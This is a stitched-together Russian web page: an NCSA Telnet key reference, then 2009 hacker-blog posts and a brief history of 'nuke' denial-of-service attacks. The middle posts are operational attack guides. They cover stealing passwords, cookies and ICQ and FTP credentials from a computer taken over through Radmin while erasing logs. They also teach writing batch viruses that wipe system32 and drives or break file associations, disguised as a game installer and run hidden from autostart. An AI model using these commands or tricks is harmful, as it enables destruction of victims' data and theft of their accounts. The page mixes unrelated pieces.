● Alt-O Блокировать вывод.

● Alt-U Удалить строку.

● Alt-K Удалить символ.

● Alt-F Начать передачу файла.

● Home Выйти из графического режима.

● Alt-I Переслать IP-адрес удаленному компьютеру.

● Alt-S Пропустить прокрутку.

● Alt-P Изменить параметры.

● Alt-X Закрыть соединение.

Непонятный VT100 и ясный локальный терминал

В NCSA Telnet терминал вашего компьютера отображается на удаленном компьютере как терминал VT100. Вы же работаете на PC. Поэтому некоторые клавиши вашего компьютера отличаются от аналогичных на VT100.

Сразу несколько сессий? ОК!

NCSA Telnet позволяет открывать несколько сессий одновременно. Для этого вы должны ввести:

telnet hostname hostname ...

где hostname — имя компьютера, с которым вы коннектитесь.

Что там есть в нашей строке состояния? Все!

Терминал VT100 удаленного компьютера требует 24 строки. В 25 строке локального компьютера вы можете видеть состояние собственной сессии. Выделенные символы отображаются в нижнем левом углу. Все эти символы соответствуют удаленному хосту. Остальные символы могут отображать все что угодно.

Открываем еще одну сессию

Открыть еще одну сессию на текущем удаленном хосте или на другом хосте можно через клавиатурную комбинацию Alt-A.

Указываем на хоста

Вы можете телнетиться только через IP-адрес. Поэтому ваша первая задача — определить IP-адрес удаленного компьютера. Для этого настройте программу на поиск имен посредством соответствующей службы удаленного сервера.

Прокручиваем в режиме обратной прокрутки

Клавиша Scroll Lock позволяет не прокручивать экран, когда идет получение данных и включать/отключать режим обратной прокрутки. Режим обратной прокрутки дает вам возможность перемещать данные на экране стрелками или клавишами PgUp и PgDn. Помните, что в режиме обратной прокрутки нельзя оперировать командами telnet.

Вырезаем и вставляем

Находясь в режиме обратной прокрутки, вы можете копировать части текста одной сессии и вставлять эти части в другую. Попробуем скопировать текст в буфер и затем вставить его из буфера в новую сессию.

1. Включите режим обратной прокрутки посредством нажатия клавиши Scroll Lock.

2. Передвиньте курсор в начало текста и нажмите клавишу пробела.

3. Передвиньте курсор в конец текста и нажмите клавишу пробела.

4. Нажмите Alt-C. Выделенный текст скопирован.

5. Выходим из режима обратной прокрутки и переключаемся на новую сессию посредством нажатия клавиш Alt-N или Alt-B.

6. Помещаем курсор в желаемое место и нажимаем Alt-V.

Выделенный текст помещен в новую сессию.

Переключаемся между сессиями

Переключиться между двумя активными сессиями можно через команду Alt-N. Имя активизированной сессии вы можете увидеть в левой нижней части экрана. Если вы хотите вернуться в старую сессию, то вы можете это сделать через команду Alt-B.

Просматриваем сообщения экрана консоли

Экран консоли отображает информацию, связанную с локальным и удаленным компьютером. Вызвать экран консоли вы можете через Alt-Z.

Закрываем текущую сессию

Командой Alt-X закрывается текущая сессия. Используя эту команду, мы наблюдали сбои на удаленном компьютере.

Перехватываем текст экрана

Если нажать Alt-C, то можно перехватить текст экрана и направить его в файл (то есть добавить текст к файлу capfile) или распечатать. Если вы повторно выберите команду Alt-C, вы отключите режим перехвата.

Если в меню Parameters вместо стандартного файла для перехвата указать prn, то можно распечатать перехваченный текст.

Невозможно перехватить текст активной сессии, если включен перехват в фоновой сессии. Решить эту проблему можно командой Alt-D.

Игнорируем бесконечный текст

Если вы хотите пропустить идущий бесконечным потоком текст, нажмите Alt-S. Вы пропустите текст только на экране, то есть сам текст будет находиться в буфере перехвата.

Перезагружаем экран VT100

Если вам не понравился текущий тип терминала и вы желаете установить новые параметры VT100 (точнее их установит удаленный компьютер), нажмите Alt-R. Параметры вашего экрана VT100, в этом случае, переустановятся таким образом, что отключится режим упаковки, разблокируется графический режим, а табуляторы установятся на каждую восьмую позицию.

Все! Надоело! Больше не могу!

Команда Ctrl-Shift-F3 применяется в том случае, когда ни одна из сессий не работает, Scroll Lock не горит, нажатие клавиш ALT-R и/или ALT-X не приводит ни к какому результату. После выполнения команды Ctrl-Shift-F3 вы выйдите из Telnet в DOS.

Не разрывая связь, выходим в DOS

Если вы хотите выйти в DOS и при этом оставаться в сессиях, нажмите Alt-E. В досовской оболочке вы можете использовать любые программы, кроме сетевой версии NCSA Telnet, сетевой версии программа FTP пользователя и программы format. Возврат в Telnet осуществляется командой exit.

Устанавливаем параметры

Если вы хотите изменить цвета, задать новый эхо-режим, настроить клавишу стирания символов, управлять режимом экрана и режимом пересылки файлов, дать другое имя сессии, типу терминала и файлу перехвата, нажмите Alt-P. После того, как вы в появившемся диалоговом окне Parameters модифицируете необходимые опции, нажмите клавишу F1 (для сохранения изменений) или Esc (для сохранения предыдущих параметров).

Символы или строки?

Вы можете воспользоваться достоинствами построчного режима в случае, если вам долго отвечает удаленный компьютер. Вы просто втаскиваете данные в буфер и пересылаете их единым пакетом на удаленный компьютер через нажатие клавиши Return. При этом вы можете воспользоваться следующими клавиатурными комбинациями:

● если вы нажмете Ctrl-U, то буфер очистится.

● удаление последнего символа, добавленного в буфер осуществляется клавишей Backspace.

● после нажатия клавиши Tab данные буфера вместе с символом табуляции немедленно отправятся на удаленный компьютер.

Два замечания относительно построчного режима:

● любой управляющий символ можно отправить на удаленный компьютер лишь в том случае, если этот символ снабдить приставкой ^.

● нельзя переслать на удаленный компьютер комбинации
Ctrl-U или Backspace.

В случае символьного режима ваши данные передаются на удаленный компьютер непосредственно в процессе их набора. Этот режим позволяет использовать весь экран вашего монитора для редактирования данных.

А что если нажать Backspace?!

По умолчанию, клавиша Backspace преобразовывается в код клавиши Delete. Некоторые удаленные компьютеры работают только с клавишей Backspace. Чтобы добиться совместимости, необходимо открыть меню Parameters и переустановить код клавиши Backspace.

Хочу другое имя сессии!

Вы можете изменить имя сессии появляющееся в строке состояния в правом нижнем углу через меню Parameters. В соответствующее поле данных вы можете ввести до 13 символов.

Хочу другой терминал!

В большинстве сессий эмулируется терминал VT100. У вас имеются другие возможности эмуляции:

● выбрать VT100 с графикой Tektronix 4014.

● использовать только команды VT100.

● игнорировать коды VT100 и Tektronix 4014.

Автоматический перенос строки

Если вы не хотите смотреть на беспорядочный поток символов, используйте символы конца строк. При включенной опции автоматического переноса строки переполненный текст автоматически переходит на следующую строку.

Адаптируемся к графическому интерфейсу

Как правило, режим быстрого вывода текста через буфер экрана несовместим с Windows. В файле конфигурации посредством опции bios вы можете установить так называемый режим адаптации.

В этом режиме текст на экране выводится через специальную программу, использующую доступ к BIOS.

Пароли и безопасность для всех .

2009-05-01T08:26:00.000-07:00

Здарова всем начинающим хакерам!С вами redbu11.Да да,именно НАЧИНАЮЩИМ хакерам,потомучто то о чём сейчас пойдёт речь,всем опытным взломщикам давно известно.В одной из моих прошлых статей (Статья называется "2 идеальных метода взлома",тем кто её не читал,советую прочитать чтобы понимать лучше эту статью) я рассказывал о способах при помощи которых вы можете проникнуть в чужой компьютер и удалённо им управлять.Но я заметил по моим знакомым которые только начали заниматся хаком,и по многим новичкам в инете,что проникая в чужую систему имея возможность полнностью ею управлять,(Например при помощи радмина) то они просто начинают прикалыватся над челом,открывая ему блокнот на рабочем столе,и писать всякую дрянь,включать или выключать музыку,перезагружать компьютер и тд...Это всё конечно очень прикольно и весело,но ведь есть и идеи получше...

-Ну вообщем,я обращаюсь ко всем кто так поступает получая доступ к чужой машине... - Эй,проснись!Ведь в твоих руках целая система полностью под твоим контролем!И ты в ней теперь имеешь все теже права что и настоящий админ!
Зачем тогда тратить время зря на эти глупые шутки над админом и рисковать?Глупо!Есть же коечто лучше....
-Конечно!Пассы!Именно они!Главная цель почти всех взломщиков!Давайте об этом и поговорим.

И так,чуть выше я заговорил о том что мы рискуем так прикалываясь над админом.Конечно же рискуем.Ведь если админ видит что вдруг не с того не с сего у него на рабочем столе начинают вылетать всякие собщения,сами по себе открыватся блокноты,включатся и выключатся музыка,то наблюдая за всем этим "безобразием",он (или она) конечно же насторожатся,и начнутся подозрения что их взломали.При этом,если админ окажется не из ламеров,он может тебя спокойно вычеслить по IP и пожаловатся твоему провайдеру,и у тебя будут проблемы.Как они тебя вычеслят???Да очень просто.

ПУНКТ 1-ЫЙ - БЕЗОПАСНОСТЬ.

И так,немного о безопасности.
*Как многие на этом прокалываются:

-Вот например взламывая комп испольуя радмин,когда вы подключаетесь к кому-нибудь используя режим полного контроля,и не только,то тот к кому вы подключаетесь,если он откроет ярлычёк запущенного сервера радмина в нижнем правом углу панели инструментов,или наведёт курсор мыши на тот ярлычёк,то ему покажут текущии IP соединения с его компьютером,или же просмотрев логи,и он увидит ваш IP.
-При взломе другим способом админ тоже может просмотреть текущии IP соедиения,и увидить вашь IP.
Так что многие не зная этого прокалываются именно на этом.

-Ну а теперь подумайте,ведь если вы будете делать всё тихо не вызывая у админа подозрений,то админ видя что всё тихо и ничего не подазревая,он даже и задумыватся не станет о том что его взломали. Как этого добится?Да тоже очень просто если соблюдать несколько правил.

*Как обезопасится:

-Если вы например взломали комп с помощью радмина,то делайте всё тихо,не прикалываясь над админом.Пре подключении,используте в радмине режим передачи данных,(File Transfer) так как админ не будет видеть всё происходящее на своих глазах и он более подходящий нам для нужных наших действий.
-Ещё так сказать,чисть логи!Не оставляй лишний инфы о себе на взломанном компьютере,так как это могло бы привети к твоему вычеслению.И чисть за собой следы.Всё лишнее после взлома удаляй,подальше от глаз админа.=)
-Если взламываешь другими способами,то тоже без лишних приколов,делая всё тихо,ведь злой дядя админ тоже не всегда спит.=)))

Ну вот,о безопасноти разобрались,теперь можно переходить к пассам!Но не забывайте что безопасность прежде всего!!!

ПУНКТ 2-ОЙ - ПАРОЛИ И ДРУГАЯ ИНФОРМАЦИЯ.

Ну а теперь,о паролях.Как же о таком забыть!Если ты из тех кто всё только прикалывается над бедным в таких случаях админом,или не знаешь что делать со взломанным компьютером,то прочитайте этот пункт,и вы поймёте что раньше вы действительно ошибались!)))

-Находясь внутри чужого компа,вы можете увести пароли от аськи,вконтакте,ящики,логи сайтов,пароли на интернет,и ещё кучу интерестный информации!Ведь это уже действительно интерестно и лучше всяких там шуточек!!!
Вам наверное не терпится хоть немного узнать о том как достать хоть какие-нибудь пассы,тогда я вас обрадую,и расскажу вам о том как можно увести НЕКОТОРЫЕ пассы имея полный контроль над компом.(Чтобы потом небыло лишний осуждений и рассуждений,напоминаю,статья расчитана на совем новичков в этом деле,и описываю я здесь САМЫЕ ПРОСТЫЕ СПОСОБЫ для получения пассов.)
Так-же тут будет часто использвася подключения через RAdmin,так как этот способ проще понять новичкам.

-Начну я пожалуй с пассов на инет.Хоть это очень расостранённая тема на сей день,но оооочень многие про это незнают,но я надеюсь что они наткнувшись на эту статью узнают хоть что то нового для себя.
Достаём пассы:

1-Пассы на инет:

-Самый простой способ заполучения паролей на интернет,это используя такую программу под названием "dialupass".Эта программа записываеит пароли от интернета жертвы в нужный тебе файл,и сохраняет их на компе у жертвы в нужном тебе месте.Очень просто.
Представим что получили доступ к компу через радмин,и управляем им через RAdmin Viewer.
Тогда действия будут таковы:

*Как использовать эту прогу:

И так для начала качаем эту прогу,скачать её можно с сайта нашей хак группы http://unlock-team.ucoz.ru/ в разделе "Софт и видео"
Cкачали?Хорошо,теперь подключаемя к жертве в режиме "File Transfer",берём тот .exe файл из скачанного архива с программой,копируем его на комп к жертве например на диск C: (Можно куда хочешь,но так удобнее).Далее полключаемся к жертве в режиме "Telnet" для того чтобы запустить нашу прогу.И так,мы в режиме телнет,и теперь через командную строку запускаем нашу прогу,делаем это следующий командой:

C:путь_к_проге /allusers /stext "Куда_сохранить_пассы".

Поясняю:
-С:путь_к_проге - путь к проге которую мы залили жертве.
-/allusers - Получить пароли всех пользователей.
-/stext - Сохранить пассы в текстовом виде.
-"Куда_сохранить_пассы" - думаю и так всё ясно,куда сохранятса пассы.

Значит если наша прога называется dialup.exe и мы хотим сохранить полуенные пассы на диске у жертвы в файле passwords.txt то команда будет такова:

C:dialup.exe /allusers /stext "passwords.txt"

Всё,вводим эту команду и жмём ENTER.После того как мы это сделали,и если мы всё правильно сделали,снова подключаемся
к жертве в режиме "File Transfer" и забираем наши пассы)))
Но не забываем удалить все эти файлы поссле получения пассов!
Пассы вы получите если они введенны и сохранены в настройках системы,что бывает почти всегда пре dial-up соединениях.

*Заполучнеия Cookies.

Для этого идём по адресу C:Documents and SettingsИмя_пользователяCookies и забираем его куки.Потом заменяем нужные нам куки жертвы например от логов на сайте каком нибудь на свои,и система принимает нас за него.Всё очень просто.Так же если завладеете куками его ящика,то зайдя в ящик посмотрите нет ли там писем от поддтверждения регистрации,напоминания пароля,или просто письма которые высылают после регистрации в которых указывают твои данные,в том числе и пасс.У меня так часто бывало.

*Пароли от аськи.

Чаще всего они хранятся в .dat файлах которые находятся в папке с асей или в даже встречал случаи когда они были в папке с кукисами.
Такчто поищите,скопируйте из себе,потом берите например IPDBrute,и расшифровывайте пассы.Тут тоже всё очень просто.

*Другие файлы.

Поищите в директории C:WINDOW файл wcx_ftp.ini,так как если жертва использует Total Commander для доступа по FTP к сайтам,то так же как и с кукисами,если вы замените этот файл на свой,то получите досткуп к его сайтам.

Также поищите текстовые файлы на рабочем столе или на других дисках жертвы с пассами,так как чаще всего они просто хранят их чтоб не забыть на видном месте.

Пробуйте тоже использовать один и тот же пасс на всех акаунтакх жертвы,часто люди используют одни и те же пароли для всего.У меня так очень часто совпадало))))

Ну вот и всё,всё САМОЕ ПРОСТОЕ что должен знать НОВИЧЁК попадая на чужие компы.Как я уже и говорил выше,я описал только всё самое-самое простое,чтоб не сильно загружать новичков в этом деле.Больше и в расширенном профиле об этом в следующих статьях.

Всё что здесь описанно,это только для ознакомительных целей,за некорректное использование этого материала и не отвечаю.

Спасибо за внимания,всем удачи!

Чем опасные бат вирусы

2009-04-25T05:03:00.000-07:00

В этой статье я не буду рассказывать как создовать вирусы с нуля вы уже это
узнали с моей предведущей статьйи (большая статья по нописанию бат вирусоов).
В этой статье я научу вас
1.Ознокомлю с самыми злыми командами
2.Научу бат переделывать в exe
3.Предложу свою версию вируса

1.
Shutdown -t 0 –s -Эта команда выключает компютер
del *.* /q

После запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в кататалогах и подкаталогах.
Параметр /q задаёт удаление без подтверждения.
Теперь мы удалим шрифты:

del C:windowsfonts /q

Почему без /s ? А зачем, там нет подпапок.
Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:

del C:windowsMedia /q

Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.

del C:windowssystem32 /q /s

Системная папка, ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов. Но есть один подвох если на файле будут стаять атрибуты "Скрытый" и "Системный" то наши удаление на них не подействует, их попросту пропустят. А вот как раз самые важные файлы то и отмечены этими параметрами (от нечайного стирания). Что в этом случае делать? Придёться сначала писать команду снятия всех атрибутов с файлов, каталогов, подкаталога.
del C:windows*.bmp /q /s

И нет стандартных рисунков, думаю понятно, почему удалены только рисунки ведь стоит маска .bmp если поставить .txt то удаляться текстовые файлы.
Премудрости удаления
Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить…
Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит нечего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:

attrib -a -s -h -r C:*.*
del C:*.* /q

Но тут нам много удалить не дадут. Всё тристо раз защищено.

Можно, например, попробовать удалить УСТАНОВЛЕНЫЕ НАМИ программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:

rd %ProgramFiles% /s /q

А вот если написать:

rd C:Program Files /s /q

то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку "Program" и папку "Files". Ладно у нас есть зарезервированая команда для папки Program Files - %programfiles%. А если мы хотим удалить "Мои документы". То вирус будет искать папки "Мои" и "Документы". В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное:

Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст.
del "%USERPROFILE%Мои документы*.*" /q /s

--------------------------------------------------------------------------------
Важно! При установки операционки можно задать любую корневую папку и вы по команде cd C:WINDOWS не куда не попадёте. Может у него корневой каталог называется win? Нам поможет имя которое перебросит нас в корнивой каталог как бы он не назывался cd %SystemRoot%. Та же история с папкой пользователя как дойти до рабочего стола? cd "C:Documents and SettingsА тут чё писать????Рабочий стол" Видите где я вас спрашиваю "Тут чё писать" действительно ведь там стоит имя пользователя, угадать почти нереально. Поэтому надо написать cd %USERPROFILE%рабочий стол. Ну в папку Program Files мы уже знаем cd %programfiles%
И не забывайте если есть в какой либо команде русские буквы например "Рабочий стол" или "Мои документы" обязательно в начале пишите команду Chcp 1251
--------------------------------------------------------------------------------

А если мы хотим удалить в папке "Windows" только Текстовые файлы (txt) и Параметры конфигурации (ini), а на диске D: Рисунки (bmp)? Мы напишем три команды одна удаляет то, вторая это... Но можно всё это написать в одной команде:

for %%Q in (C:WINDOWS*.txt *.ini D:*.bmp) do del %%Q

Видно что мы можем написать свои пути в скобках, хоть какие, так же можем пользоваться масками разных комбинаций. А после слова do у нас стоит команда del так вот мы можем написать например attrib +h +s и теперь на диске С: скроются текстовые файлы и файлы ini. Ну суть понятна? В скобках пишем любой путь или пути, а после do любую команду (которую можно применить к файлу).

Теперь давайте предположим что мы сделали вирус, который при загрузке компа создаёт ненужный мусор. "Жертва" его удаляет, а он при загрузке появляется снова. А если "жертва" мусор не удалит? То наш тупой вирус будет его пытаться создать опять, может даже начнёт задавать "жертве" вопросы о перезаписи... "жертва" сразу обнаружит в чём дело и всё исправит. А давайте напишем команду которая проверяет, есть ли наш мусор на том месте где мы его создавали или уже нет. Если есть вирус завершиться. Если нет то сново создаст мусор.

if not VIR*?????????.sys goto x
exit
:x
МУСОР.

Помните как мы создавали мусор? Брали настоящие файлы копировали их с другим расширением и приписывали в начали приставку "VIR". Так вот наш вирус проверяет, есть ли хоть один файл у которого есть расширение .sys и приставка "VIR" в начале (можете писать что угодно, исходя из содержания вашего вируса). Если таковые имеются он выходит командой exit. Если таких нет, то переходит к точки x и создаёт мусор снова.
Надеюсь вы понимаете что это только небольшой кусок кода вируса, например в начале должна стоять команда перехода в каталог, где будет всё проверяться... Где написано слово "МУСОР" должны быть написаны команды создования мусора.

--------------------------------------------------------------------------------
И ещё, я чё то всё говорю путь диск C:, диск C:, но для полной уверености можно я бы сказал НУЖНО прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D:, если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на "O" ; "P" ; "Q" ; "R" ; "S" ; "T" ; "U" или ещё какие (правильно делают). Безопасность, будь она не ладна.

rd C: /s /q -а это гдавноя команда удоления вить она может отформотировать диск за 10-20 сек в зовисимости от обёма диска

chcp 1251
cd "%USERPROFILE%Главное менюПрограммы"
md 1 …и.т.д.

и папки будут создаваться в разделе программы.

Или допишите вот так…

chcp 1251
cd "%USERPROFILE%Главное менюПрограммыАвтозагрузка"
md 1 ….и.т.д.

допустим мы создадим 100 пустых папок в папке "Автозагрузка" и при включение компа каждый раз будут открываться сотня папок, даааа так сдохнуть можно каждый раз их закрывая…

Удалим расширение
Кстати говоря, очень вредный вирус получиться, если поменять расширение. Вот например кажется ярлык подумаешь… он мне и не нужен вовсе… ан нет без ярлыков будет просто ужасно вы только представьте чтобы сыграть в игру вам достаточно щелкнуть по ярлыку находящемуся на вашем рабочем столе, а когда ярлыка нет… вам надо лезть в диск С: заходить в папку «Игры» потом что-то ещё… да так сдохнуть можно! Итак, я тут подумал, одним из важных вещей у нас является ярлык, так мы берём и…

assoc .lnk=.avi

здесь наглядно показано, что я хочу поменять ярлык (расширение, как известно .lnk) на музыкальное расширение .avi и уже понятно, что ярлык с таким расширением ни куда вас не пошлёт! А вот вы комп будете долго посылать.… Ну и, конечно же, нетрудно догадаться, как такой вирусик может оказаться разрушительным, мы с вами поменяем приложение .exe и тогда ни одна программа, ни запуститься!!!

assoc .exe=.avi

тут показано расширение программ .exe ну и уже по традиции я меняю его на .avi вы кстати можете придумать что-нибудь своё… например поменять jpg (рисунки) например на .virus вот весело будет когда он захочет посмотреть свои картинки…
можно же просто удалить расширение, не заменяя его на другое:

assoc .exe=

после знака = надо нажать один раз пробел, а уже потом сохранять наш вирусик.
Кстати говоря, если хотите доставить своей жертве хорошую встряску, напишите в одном вирусике команд 20 удалений расширений все (разные и необходимые)
В таблице я привёл некторые расширения, если вам кажеться что их не достаточно пишите свои.

Приложение .exe .com
Текстовые файлы doc .txt .wp .diz .log .wri
Музыкальные файлы .mp3 .wav .avi .wmv .mpg
Картинки .bmp .jpg .gif .tif .pic
Ярлыки .lnk .url
Архиваторы .rar .zip .arj .cab lzh.
Шрифты fon .ttf .atm
Файл реестра .reg .key
Системные файлы .sys .dll .rnf .drv .ega
Файл справки .chm .hlp

Можно путь для копирования поставить другой путь:

copy C:*.* C: program наш никчёмный файл появиться на диске С:

можно скопировать, что-нибудь другое:

copy C:windowssystem32*.* C:Microsoft*.exe

Видно что все файлы будь это текст, или музыка мы сохраняем как пиложение *.exe. Но это уже очень длительный процесс (копировать всё из system32) придется приукрасить программу. Cмотри главу: "Создаём эффект программы" Есть другой способ копирования:

dir c: /s/a > C:/1.txt

Эта команда просто скопирует все пути к папкам и файлам в один текстовый файл (долго). А можно в одной команде задать несколько каталогов и все файлы из них слепяться в один кусок, например:

copy C:WINDOWS*.txt + C:WINDOWSHelp*.* KYSOK

Мы видим что я беру из папки "Windows" все текстовые файлы а из папки "Help" вообще все файлы и слепливаю кусок из всех них в файл "KUSOK" (од даже будет без расширения, но можно его и сделать, если пожелаете)

А можно полностью скопировать папку "system32" в другое место и поставить атрибут скрытый, чтобы жертва не удалила нашу совершенно ненужную копию.

xcopy C:WINDOWSWeb C:mysor /q /e /h /y копируем папку web в папку musor.
attrib +h +s C:/mysor всё скрываем с глаз людских.

--------------------------------------------------------------------------------
Если посмотреть то я задал много параметров для команды xcopy (у неё их ещё больше). Итак параметр /q ну это как везде, чтобы на экране не было лишних сообщений. /e для копирования пустых каталогов. По умолчнию Системные и Скрытые файлы не копируються так вот параметр /h разрешает их копирование. Если при копировании имена совпадут то будет задан вопрос о перезаписи, зачем нам вопросы вот мы влепили параметр /y.
--------------------------------------------------------------------------------

Ах, совсем забыл, не пишите вот такую команду:

copy C:*.* C:Windows

А то антивирус, если он есть у нашей жертвы, обязательно обезвредит этот наш вирус, посчитав его за Троян.BAT.CopyToWindows.

Можно оповещать нашу жертву о ходе действия нашего вируса.
для этого есть команда msg * Подождите программа выполнит соответствующие операции или както так короче можно написать чо чочеш

Можно использовать и другой способ, открывая на весь экран блокноты, в которых будет написано сообщение:

echo >> read.txt Пожалуйста, внимательно прочитайте! Перед тем как установить игру закройте….и.т.д.
start/max read.txt

Тут так же действует вывод сообщения но мы задали его отправить в текстовый файл read. Вторая строка говорит, что мы хотим открыть наш текстовый файл уже с готовым сообщением во весь экран. И пока наша жертва будет читать, что там ей надо сделать, вирус сделает своё дело. Можно конечно вместо скучной лекции написать прикольные анекдоты и тогда жертва уже точно отвлекаться.

Можно остоновить выполнение нашего вируса хитрой командой. Вылетит собщение "Для продолжения нажмите любую клавишу...".

pause

Красивая оболочка
Ну, вот мы отослали наш с вами готовый вирусик вашему «другу», а он его не открыл т.к. у него появились сомнения на счёт такого странного файла и весит он мало и значок не внушает доверия и расширение какое-то странное… Мы немного постараемся исправить положение улучшив вид нашей ложной программы, это как бы вторая часть главы «Создаём эффект программы». Кстати говоря, я вот такое улучшение употреблял ко всем своим тупым вирусам и вам советую. Правда улучшать нам поможет WinRAR-это самый знаменитый архиватор.
Первым делом открываем WinRAR (его можно скачать тут
http://www.rarlab.com
http://www.rarsoft.com)
Рассматривать архиватор мы будем на примере создания вируса, который вырубает комп после включения, помните? Да ещё сделаем так, чтобы при следующем включение он опять таки отключался!

Берём уже заранее заготовленный файл отключения через x секунд, оттаскиваем в открытое окно архиватор и бросаем его туда. Тут же вылетает окно «Имя и параметры архива» тут можно указать «Степень сжатия» указать «Имя архива» а мы просто ставим галочку на квадратик «Создать SFX-архив» можно тут же заметить, что расширение меняется на .exe это значит, что мы делаем настоящее приложение! Заходим на страницу «Дополнительно» и нажимаем кнопку «Параметры SFX» вылетает окошко «Дополнительные параметры SFX» Под полем «Путь для распаковки» можно поставить, чтобы ваш файл распаковался в папку «Program Files» или создать его в «Текущей папке» то есть там, где будет запущен наш вирус, в самом поле «Путь для распаковки можно даже не чего и не писать. А вот в поле «Выполнить после распаковки» надо написать имя нашего файла с расширением, например: virus.bat (вот собаки ещё расширение им указывай! Кстати это мы сделали, для того чтобы непосредственно, после того как мы откроем (архив) вирус он автоматически запуститься, и отключал систему, или там сотрет, что-нибудь «ненужное»). В поле «Выполнить до распаковки» не чё писать не надо. На вкладке «Дополнительно» нажимаем кнопку «Добавить ярлык…» вылетает новое окно, где написано «Место создания ярлыка» ставим пометку «В папке Автозагрузка» (можно и в «Меню Пуск» и «На рабочем столе» но нам надо, чтобы при включении комп вырубался снова ведь так»).

--------------------------------------------------------------------------------
И поэтому когда при следующей загрузке компа система начнёт загружать элементы «Автозагрузки» то само собой загрузит, и наш файл и делать нечего отключит комп снова! Правда обводка тут слишком проста, когда идёт сама загрузка, просто держите нажатой клаву «Shift» и ком автоматически обойдёт элементы «Автозагрузки» и соответственно не отключиться, но не все это знают!

--------------------------------------------------------------------------------
В поле «Имя файла, для которого будет создан ярлык» пишем имя нашего файла, например virus.bat ну и ещё и в поле «Имя ярлыка (файла .lnk):» пишем, что вашей душе угодно (можно конечно написать что-нибудь такое типа: «Microsoft» или «Intel» и тогда это будет выглядеть более убедительно чем «Отключение») и всё, больше не чего не пишите разве можно написать в поле «Описание ярлыка», что-нибудь такое: «Not to delete» или «System file» ну чтобы придать немного сомнения. Подтверждаем ОК.
На странице «Режимы» где написано «Режим ввода информации» можно поставить пометку «Скрыть всё» и тогда при распаковки ни кто не чего у вас не спросит, а просто распакует и всё. Я советую поставить пометку «Не показывать начальный диалог» и тогда наша программа ни будет нас спрашивать, куда установить наш файл, а просто покажет лицензию, которую мы с вами щас и напишем. Ах да где написано «Режим перезаписи» ставим пометку «Перезаписывать без подтверждения».
На странице «Лицензия» в поле «Заголовок окна с лицензией» пишем название, например «Игра» если вы косите под игру, или «garbage collector» чтобы совсем запутать. В поле «Текст лицензии» вешаем лапшу на уши и даём волю своей фантазии ну, например:
Сейчас работает мастер установки игры «pirate». Это длительный процсс и отмена операции может повредить. Пожалуйста внимательно прочитайте, что будет написано ниже для полноправного использования данной продукцией:…тру ля ля.…ля ля… Ну там лечите дальше сколько душе угодно, это для того чтобы не оставить не малейшего сомнения на счёт происхождения и назначения программы, и вот ещё пожалуйста пишите без ошибок, а то вас тут же раскусят!
На странице «Текст и значок» не чего не следует писать, так этого программа не покажет из-за того, что мы поставили отметку «Не показывать начальный диалог» если её не поставить, то и тут можно накуролесить всякой ахинеи. Правда следует воспользоваться ещё одним маневром, где написано «Значок SFX-архива» можно я бы сказал нужно выбрать хоть какой-нибудь значок, а то жертву может отпугнуть значок который подставиться по умолчанию. А если загружить привычный значёк "WORD(а)" или картинки, то жертва без малейших подозрений с радостью запустит... хм... вот. И ещё можно загрузить какую-нибудь картинку «по теме конечно» и тогда она будет отображаться при чтении лицензии (это красивый эффект). Ну, вот, пожалуй, и всё если всё грамотно и правильно сделать, то у жертвы не будет и малейшего сомнения, что у него в руках лицензионная игра, ну а когда он её распакует, обрадуется, так что придётся переустанавливать систему!

Надо было написать это в главе «Отключение» но тогда мы не знали этих команд. Я предлагаю мало того, что мы поставим наш файл в папку «автозагрузка» так мы его скроем т.к. тот, кто догадается в эту папку посмотреть, без труда наш вирус удалит многократное выключение не удаться:

Chcp 1251
cd "%USERPROFILE%Главное менюПрограммыАвтозагрузка"
attrib +h

вы видите, что я сначала переключаюсь на русскую кодовую страницу это потому что в нашей команде есть русские буквы.
Только вот, есть одна здоровая загвоздка, из трёх компов (на которых я проверял эту команду), на двух автозагрузка не сработала просто убрала все элементы и как будто их и не было.

Но и тут есть запара жертва открывает вир видит выскакивает окно
жертва быстринько его закрывает и всё вир не сработал но я нашёл способ чтоб окно не открывалось нужно вписать скрипт в самораспоковуйщийся архив
и имно его архив и должен открыть а скрипт этот мы будем писать на vbs его можно создать в блокноке а прописывать мы там будем
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run"C:sistem32Connect.bat ", 0, true

Как видете тут указан путь к виру я не ззнаю какой путь будет у вас но в моём вире он такой какой я покозал
ну вот в принцепи и всё а мой вир вы можете скачать с http://depositfiles.com/files/k5dt7te0g
если чтото не поняли пишыте в коментарии я отвечу

Что такое Nuke

2009-03-20T03:00:00.000-07:00

Словом Nuke (нюк) называют сегодня любую атаку на порты удаленных компьютеров, приводящую к краху операционной системы или разрыву интернет-соединения. Nuke не нарушает состояние файловой системы и не рушит "железо" компьютера. Перезагрузившись, пользователь может продолжить работу в Сети. Все началось с атаки, исходный код которой на языке С назывался nuke.c. Атака не получила широкого распространения, так как могла работать только на UNIX системах с правами root. Идея nuke.c заключалась в том, что она отсылала неправильные (invalid) ICMP пакеты, и машина-хост теряла связь.

В январе 1997 появилась атака под названием Ping o' Death, и 18 распространенных операционныхсистем оказались к ней весьма чувствительны. Ping o' Death основана на отсылке более 65 507 байтов данных. Так как большинство систем не собирают все пакеты до того, как получат их полностью, то при определенных ухищрениях можно добиться эффектного результата - полученные данные просто не уместятся в 16-битной внутренней переменной, возникает неустранимая ошибка и рушится операционная система. Но, пожалуй, первой широко известной атакой стала Out Of Band (WinNuke).

